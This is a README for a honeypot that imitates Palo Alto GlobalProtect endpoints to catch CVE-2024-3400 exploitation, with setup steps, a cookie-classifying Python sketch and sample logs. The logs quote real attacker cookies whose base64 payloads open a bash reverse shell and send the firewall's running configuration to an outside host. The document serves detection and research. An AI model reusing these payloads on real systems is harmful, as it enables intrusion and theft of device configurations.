## https://sploitus.com/exploit?id=E4213DDB-E340-52D1-8B87-AD82B52CE84B
# CVE-2024-3400-pot
A simple honeypot for CVE-2024-3400, the Palo Alto PAN-OS command injection vulnerability.

# Features
* Serve a fake `/global-protect/login.esp` (the login page of the GlobalProtect Portal)
* Accept `POST /ssl-vpn/hipreport.esp` requests carrying a `Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>;` header
* Extract the filename from the cookie (if present)
* Save the body of the POST request to that file
* Answer a later `GET /global-protect/portal/images/<file>` with `403` instead of `404`, mimicking the real appliance
* Collect IP & User-Agent of the request
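As an added illustration (not the project's own code), the decisions the feature list above describes, in standard-library Python only: pull the `SESSID` value out of the Cookie header, resolve the `../` traversal to see whether it lands in the images directory, refuse filenames the decoy must not write, flag cookies carrying shell metacharacters, and return the status codes listed. The `IMAGES_DIR` constant, the `SAFE_NAME` rule and the classification labels are assumptions made for this example.

```python
import posixpath
import re

# Directory the traversal in the README lands in; whatever is written there is
# later fetched as GET /global-protect/portal/images/<file> (assumed constant).
IMAGES_DIR = "/var/appweb/sslvpndocs/global-protect/portal/images/"
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
SHELL_META = re.compile(r"`|\$\(|\$\{|\|")


def sessid_value(cookie_header):
    """Return the raw SESSID value from a Cookie header, or None."""
    # Parsed by hand: http.cookies silently drops values containing the
    # characters the exploit cookies carry, and the decoy must see them all.
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name.strip() == "SESSID":
            return value
    return None


def classify_sessid(cookie_header):
    """Decide what a request's Cookie header means before the decoy acts on it."""
    value = sessid_value(cookie_header)
    if value is None:
        return {"kind": "none"}
    if SHELL_META.search(value):
        # Backticks / ${IFS} in the path: the command-injection stage in the logs
        return {"kind": "command_injection", "raw": value}
    if ".." not in value:
        return {"kind": "benign", "raw": value}
    # Resolve ../ the way the appliance filesystem would: /../../x becomes /x
    resolved = posixpath.normpath("/" + value.lstrip("/"))
    filename = posixpath.basename(resolved)
    if not resolved.startswith(IMAGES_DIR) or not SAFE_NAME.match(filename):
        # Traversal elsewhere, or a name the decoy must never write to disk
        return {"kind": "traversal", "resolved": resolved}
    return {"kind": "file_write", "filename": filename}


def status_for(method, path):
    """HTTP status the decoy returns, following the README's feature list."""
    if method == "GET" and path == "/global-protect/login.esp":
        return 200  # fake portal login page
    if method == "POST" and path == "/ssl-vpn/hipreport.esp":
        return 200  # accept the "HIP report"; cookie goes to classify_sessid
    if method == "GET" and path.startswith("/global-protect/portal/images/"):
        return 403  # 403 instead of 404, as the README describes
    return 404
```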

# Prerequisites
* Python 3.x installed on your server.
* Python PIP
  * `pip install flask`
* Generate a self-signed certificate and private key with OpenSSL:
  ```
  $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365

  Enter PEM pass phrase:
  Verifying - Enter PEM pass phrase:
  -----
  You are about to be asked to enter information that will be incorporated
  into your certificate request.
  What you are about to enter is what is called a Distinguished Name or a DN.
  There are quite a few fields but you can leave some blank
  For some fields there will be a default value,
  If you enter '.', the field will be left blank.
  -----
  Country Name (2 letter code) [XX]:XX
  State or Province Name (full name) []:XX
  Locality Name (eg, city) [Default City]:
  Organization Name (eg, company) [Default Company Ltd]:XX
  Organizational Unit Name (eg, section) []:XX
  Common Name (eg, your name or your server's hostname) []:XX
  Email Address []:XX
  ```
* Remove the passphrase from the private key:
  ```
  $ openssl rsa -in key.pem -out key1.pem
  Enter pass phrase for key.pem:
  writing RSA key

  $ mv key1.pem key.pem
  ```

# Usage
To start the honeypot, run the following command:
```
sudo nohup python3 CVE-2024-3400-pot.py &
disown
```

* Check that the script is running:
```
sudo netstat -lnput | grep 443
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      1208/python3

sudo ps aux | grep <PID>
sonic        1208  0.0  3.5 189448 34364 pts/0    S    00:35   0:17 python3 CVE-2024-3400-pot.py
```

# Example Logs
```
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:443
 * Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
```